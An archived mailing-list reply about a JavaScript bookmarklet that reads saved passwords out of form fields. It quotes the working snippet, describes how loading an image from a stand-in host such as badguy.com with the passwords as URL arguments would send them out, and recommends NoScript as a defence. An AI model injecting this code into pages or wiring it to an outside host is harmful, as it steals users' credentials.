Re: Protection against showing hidden passwords with javascript

matthewslaney@xxxxxxxxx writes:

Hi,

I recently learned of the "exploit" where you can run a javascript
command to view saved passwords that are hidden. This code:

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms;
for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if
(f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if
(s) alert("Passwords in forms on this page:\n\n" + s); else
alert("There are no passwords in forms on this page.");})();

I was wondering if there was any way to protect against this?

Please refrain from stating the obvious, "don't save your passwords".
There are a couple of sites I use frequently and don't care about
security too much, but don't want my passwords to disappear.


This code is a good example of why cross-site scripting (XSS)
vulnerabilities are a big deal, and why you don't want untrusted third
party javascript running in the security context of another domain's
page. That code can be trivially modified to load a blank images
from an attacker's site with arguments attached that send those
passwords to that site's log file (e.g. loading
badguy.com/blank.jpg?password1=blah&password2=foo)

To protect against this on the client end, turning off javascript
(made more manageable by the Firefox NoScript plugin as suggested by
another user) is probably the most realistic countermeasure.

There are other risks associated with auto populating passwords in
pages, and like any other security issue, you have to make the balance
of convenience and security that's right for you.

Best Regards,
--
Todd H.
http://www.toddh.net/
.

Relevant Pages

  • Re: [Full-disclosure] Off topic rant to my friends
    ... I dunno if this is any worse than the many, ... went to a security conference users got insulted. ... SUSAN and BOB" were not good passwords. ... I do it to protect my company's investment. ...
    (Full-Disclosure)
  • Re: More SSH trolling
    ... > against the usage of secure passwords. ... SSH's encryption does protect effectively against ... "useless" since most attackers worldwide do not have the ability to ... standard security measures... ...
    (Fedora)
  • Redhat Linux Network Security
    ... Redhat Linux Network Security ... administrators either don't know what is necessary to protect a system ... of a terminal is through weak passwords. ...
    (comp.lang.tcl)
  • Redhat Linux Network Security
    ... Redhat Linux Network Security ... administrators either don't know what is necessary to protect a system ... of a terminal is through weak passwords. ...
    (comp.os.linux.setup)
  • Redhat Linux Network Security
    ... Redhat Linux Network Security ... administrators either don't know what is necessary to protect a system ... of a terminal is through weak passwords. ...
    (comp.os.linux.development.system)